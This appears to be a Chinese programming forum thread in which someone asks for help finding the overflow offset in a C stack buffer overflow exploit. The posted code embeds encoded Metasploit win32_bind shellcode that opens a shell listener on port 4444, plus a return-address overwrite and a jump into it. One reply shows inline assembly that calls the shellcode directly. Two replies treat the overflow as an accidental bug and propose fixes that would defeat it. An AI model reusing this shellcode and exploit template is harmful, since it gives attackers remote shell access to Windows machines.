日期:2014-05-17  浏览次数:20721 次

关于溢出点定位

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char EvilBuffer[2020];
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char shellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0e"
"\x32\x48\xb6\x83\xeb\xfc\xe2\xf4\xf2\x58\xa3\xfb\xe6\xcb\xb7\x49"
"\xf1\x52\xc3\xda\x2a\x16\xc3\xf3\x32\xb9\x34\xb3\x76\x33\xa7\x3d"
"\x41\x2a\xc3\xe9\x2e\x33\xa3\xff\x85\x06\xc3\xb7\xe0\x03\x88\x2f"
"\xa2\xb6\x88\xc2\x09\xf3\x82\xbb\x0f\xf0\xa3\x42\x35\x66\x6c\x9e"
"\x7b\xd7\xc3\xe9\x2a\x33\xa3\xd0\x85\x3e\x03\x3d\x51\x2e\x49\x5d"
"\x0d\x1e\xc3\x3f\x62\x16\x54\xd7\xcd\x03\x93\xd2\x85\x71\x78\x3d"
"\x4e\x3e\xc3\xc6\x12\x9f\xc3\xf6\x06\x6c\x20\x38\x40\x3c\xa4\xe6"
"\xf1\xe4\x2e\xe5\x68\x5a\x7b\x84\x66\x45\x3b\x84\x51\x66\xb7\x66"
"\x66\xf9\xa5\x4a\x35\x62\xb7\x60\x51\xbb\xad\xd0\x8f\xdf\x40\xb4"
"\x5b\x58\x4a\x49\xde\x5a\x91\xbf\xfb\x9f\x1f\x49\xd8\x61\x1b\xe5"
"\x5d\x61\x0b\xe5\x4d\x61\xb7\x66\x68\x5a\x59\xea\x68\x61\xc1\x57"
"\x9b\x5a\xec\xac\x7e\xf5\x1f\x49\xd8\x58\x58\xe7\x5b\xcd\x98\xde"
"\xaa\x9f\x66\x5f\x59\xcd\x9e\xe5\x5b\xcd\x98\xde\xeb\x7b\xce\xff"
"\x59\xcd\x9e\xe6\x5a\x66\x1d\x49\xde\xa1\x20\x51\x77\xf4\x31\xe1"
"\xf1\xe4\x1d\x49\xde\x54\x22\xd2\x68\x5a\x2b\xdb\x87\xd7\x22\xe6"
"\x57\x1b\x84\x3f\xe9\x58\x0c\x3f\xec\x03\x88\x45\xa4\xcc\x0a\x9b"
"\xf0\x70\x64\x25\x83\x48\x70\x1d\xa5\x99\x20\xc4\xf0\x81\x5e\x49"
"\x7b\x76\xb7\x60\x55\x65\x1a\xe7\x5f\x63\x22\xb7\x5f\x63\x1d\xe7"
"\xf1\xe2\x20\x1b\xd7\x37\x86\xe5\xf1\xe4\x22\x49\xf1\x05\xb7\x66"
"\x85\x65\xb4\x35\xca\x56\xb7\x60\x5c\xcd\x98\xde\xfe\xb8\x4c\xe9"
"\x5d\xcd\x9e\x49\xde\x32\x48\xb6";

int main(void)
{
char Buffer[2000] = {0};
memset(EvilBuffer, '\x41', 2020);
memcpy(EvilBuffer + 2004, "\x12\x45\xfa\x7f", 4);
memcpy(EvilBuffer + 2008, "\xE9\x13\xFC\xFF\xFF", 5); //Jmp -1000
memcpy(EvilBuffer + 1600, shellcode, 344);
  //int len=strlen(EvilBuffer);
strcpy(Buffer, EvilBuffer);
return 0;
}
以上程序是在缓冲区溢出点定位上有问题,请帮忙看下,对于溢出点定位的方法一直不是很清楚。谢谢了!

------解决方案--------------------
内存越界了,Buffer的长度是2000,EvilBuffer的长度大于2000,而且最后缺少结尾的\0,这样改一下:
C/C++ code
int main(void) 
{ 
char Buffer[2020] = {0}; 
memset(EvilBuffer, '\x41', 2020); 
memcpy(EvilBuffer + 2004, "\x12\x45\xfa\x7f", 4); 
memcpy(EvilBuffer + 2008, "\xE9\x13\xFC\xFF\xFF", 6); //Jmp -1000 
memcpy(EvilBuffer + 1600, shellcode, 344); 
    //int len=strlen(EvilBuffer); 
strcpy(Buffer, EvilBuffer); 
return 0; 
}

------解决方案--------------------
Buffer 的数组改为2021大小才能装下EvilBuffer,最后用\0结尾
------解决方案--------------------
__asm
{
lea eax,BindShellcode //将BindShellcode的地址传递给eax
call eax //BindShellcode中的内容应该为某个API或者函数,此处就是调用相应函数
}